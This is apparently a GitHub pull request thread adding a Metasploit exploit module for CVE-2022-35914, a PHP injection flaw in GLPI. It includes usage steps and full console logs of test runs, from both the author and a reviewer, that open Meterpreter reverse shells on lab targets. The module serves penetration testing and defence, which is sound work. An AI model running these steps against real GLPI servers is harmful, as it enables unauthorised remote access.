Add RCE module for CVE-2022-35914 php code injection

[bwatters-r7]

This PR adds a module for CVE-2022-35914, a php command injection vulnerability in GLPI versions up to and including 10.0.2.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/linux/http/glpi_htmlawed_php_injection
• set upripath <uripath>
• set rhost <rhost>
• set lhost <lhost>
• Verify you get a session

msf6 exploit(linux/http/glpi_htmlawed_php_injection) > show options

Module options (exploit/linux/http/glpi_htmlawed_php_injection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /glpi/           no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.109     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set rhost 10.5.132.190
rhost => 10.5.132.190
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set uripath /glpi/glpi/
uripath => /glpi/glpi/
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set verbose true
verbose => true
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > check

[*] populate_values
[*] token = a7a58e70d2ff93dfd906d325bb7e5b61
[*] sid = 5h8k1gqcjhp8u7q37h3v14uegc
[*] 10.5.132.190:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run

[*] Started reverse TCP handler on 10.5.135.109:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] populate_values
[*] token = c19463adacf7224c3ebaa35e7f8422c8
[*] sid = q2efgo77srae1pgjttj9tqqcjg
[+] The target appears to be vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] execute_command
[*] Sending stage (40164 bytes) to 10.5.132.190
[*] Meterpreter session 1 opened (10.5.135.109:4444 -> 10.5.132.190:53030) at 2022-10-19 14:43:02 -0500

meterpreter > sysinfo
Computer        : ubuntu-20041
OS              : Linux 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022
Architecture    : x64
System Language : C
Meterpreter     : python/linux
meterpreter > getuid
Server username: www-data
meterpreter > 

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[jheysel-r7]

Release Notes

This PR adds a module for CVE-2022-35914, a php command injection vulnerability in GLPI versions up to and including 10.0.2.

[jheysel-r7]

Thanks for the great PR @bwatters-r7! The installation instructions were straight forward and to the point. Was able to get a vulnerable instance installed with out issues. Everything seems logically and grammatically correct in everything from docs to exploit and check methods 👌

msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set rhosts 172.16.199.130
rhosts => 172.16.199.130
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (40168 bytes) to 172.16.199.130
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.130:55466) at 2022-10-24 12:33:04 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022
Architecture    : x64
System Language : C
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.199.130 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set target 1
target => 1
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Linux (Dropper) for linux/x64/meterpreter/reverse_tcp
[*] Sending stage (3045348 bytes) to 172.16.199.130
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.130:43856) at 2022-10-24 12:33:41 -0400
[*] Command Stager progress - 100.00% done (809/809 bytes)

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.16.199.130
OS           : Ubuntu 20.04 (Linux 5.15.0-52-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >